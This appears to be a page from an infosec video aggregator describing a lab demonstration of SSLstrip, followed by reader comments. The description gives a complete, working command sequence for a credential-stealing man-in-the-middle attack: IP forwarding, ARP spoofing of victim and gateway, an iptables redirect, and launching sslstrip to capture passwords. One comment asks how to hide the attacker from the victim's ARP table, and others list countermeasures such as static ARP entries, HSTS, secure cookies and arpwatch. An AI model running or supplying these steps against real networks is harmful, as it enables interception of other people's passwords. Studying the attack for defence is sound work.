Description: SSLstrip was released by Moxie to demonstrate the vulnerabilities he spoke about at Blackhat 2009. In this video we will look at how to get started with SSLstrip. We setup 2 vmware machines, one running Widnows XP (victim) and the other Backtrack 3 (Attacker). Before we actually begin hacking using SSLstrip, we need to setup the entire Man in the Middle Mechanism and packet redirection / forwarding mechanism. We do this by using the following commands in sequence:
1. Setting up IP Forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
2. ARP MITM attack between Victim and Gateway:
arpspoof -i eth0 -t 192.168.1.6 192.168.1.1
3. Setting up port redirection using Iptables:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
4. Start the SSLstrip tool and make it listen to port 10000 (default anyways)
python sslstrip.py -w secret
Once this setup is up and running perfectly, all of our victim's traffic will be routed through us. In particular, HTTP traffic will be redirected to our port 10000, where SSLstrip is listening. After this we will be able to eavesdrop and steal all of the victim's passwords sent supposedly over "SSL". If you are interested in understanding how the SSLstrip tool actually works, please view the entire presentation video here. You can download the SSLstrip tool here.
Tags: tools ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Very good video thank you.
good video. Pls mention countermeaseures
Thats really cool dude
Great job
Ok i got a question here.
When you use arpspoof (in a non VM environment) in actual live scenario, what happens is that the arp table of the victim (winXP) also shows the Attacker IP and his MAC Address thereby exposing the attacker to the Victim.
Any ways to circumvent this.
BTW i work on network forensics.
well this is great my freind..good Job..I just got my sec+ and its been a while lyk 5 year into security. But I have ones question which might be very dump!
That Ip u used is a private one, I mean that is the IP user gets after going through NAT, How can we figure that out. I know this might be an easy one, but I just dont know.
Thanks This was awesome...
I am trying to use this together with a SLAAC Attack instead of a regular ARP spoof attack but I can't get it to work. It's probably naptd messing things up. Any Ideas?
Can u tell me the countermeasure for preventing this???
XP --> 192.168.1.6 (NAT)
Please help me out-
1) it has only 1 interface which is NAT, then how will backtrack be able to ping XP?
2) What should be the ip configuration with backtrack?
nice one. played with sslstrip a little bit, seems like my netbanking has a solution for this, good and at the same time curious how they solved it. Will investigate :)
The solution to this issue is very simple: make sure your login pages are using https. Keeping faith with the X.509 infrastructure which https uses (which may not be such a good idea), as long as https is being used, you're safe.
Thanks for the great video; I'm going to have lots of fun with ARP spoofing.
Some of countermeasure can be static arp table with default gateway pointing to the real hardcoded MAC address:
arp -s 192.168.1.1 00-aa-11-bb-22-cc
Great video. TNX
Another countermeasure is either HSTS (Chrome or Firefox) or CSP (Firefox). It won't protect first time users, but the vast majority of your traffic (and your most sensitive information) will be posted by returning visitors.
Additionally, some cookies can be set to ONLY send via SSL, so existing sessions won't be preserved over sslstrip. Users *might* suspect something's up when they get mysteriously logged out.
TC
Hi,
This for those of you who were wondering if there was any counter measure available.
Well yes, you can use tools like 'arpwatch' or 'arpon' that allow you to prevent arp spoofing.
Arpwatch keeps a watch on your arp table and any changes found in the same are recorded. You can provide settings using which you will be alerted whenever your arp table gets modified.
Arpon is one step further. It not only detects the change, it prevents it as well, thus automatically securing your machine from arp spoofing.
Great video, good job :)
Awesome video!!
Fragrouter -B1 is also a good option and does set the system in the routing mode. The only advantage being you can see which connections are being routed in a verbose fashion.
Great tuturial. I have followed all your steps when I get to the end on the victims PC to log into Gmail, Yahoo, or any other ssl site the browser will not open to any of those pages in IE, FF or Chrome when I stop the arpspoofing and refresh the page it will come up then, I'm using Comcast for internet. Any thought will be greatly appreciated. Thanks
Great video Vivek,
I am also facing the same issues as: PC to log into Gmail, Yahoo, or any other ssl site the browser will not open to any of those pages in IE, FF or Chrome when I stop the arpspoofing and refresh the page it will come up then: as spse850 mentioned
facing the same issues as hakpak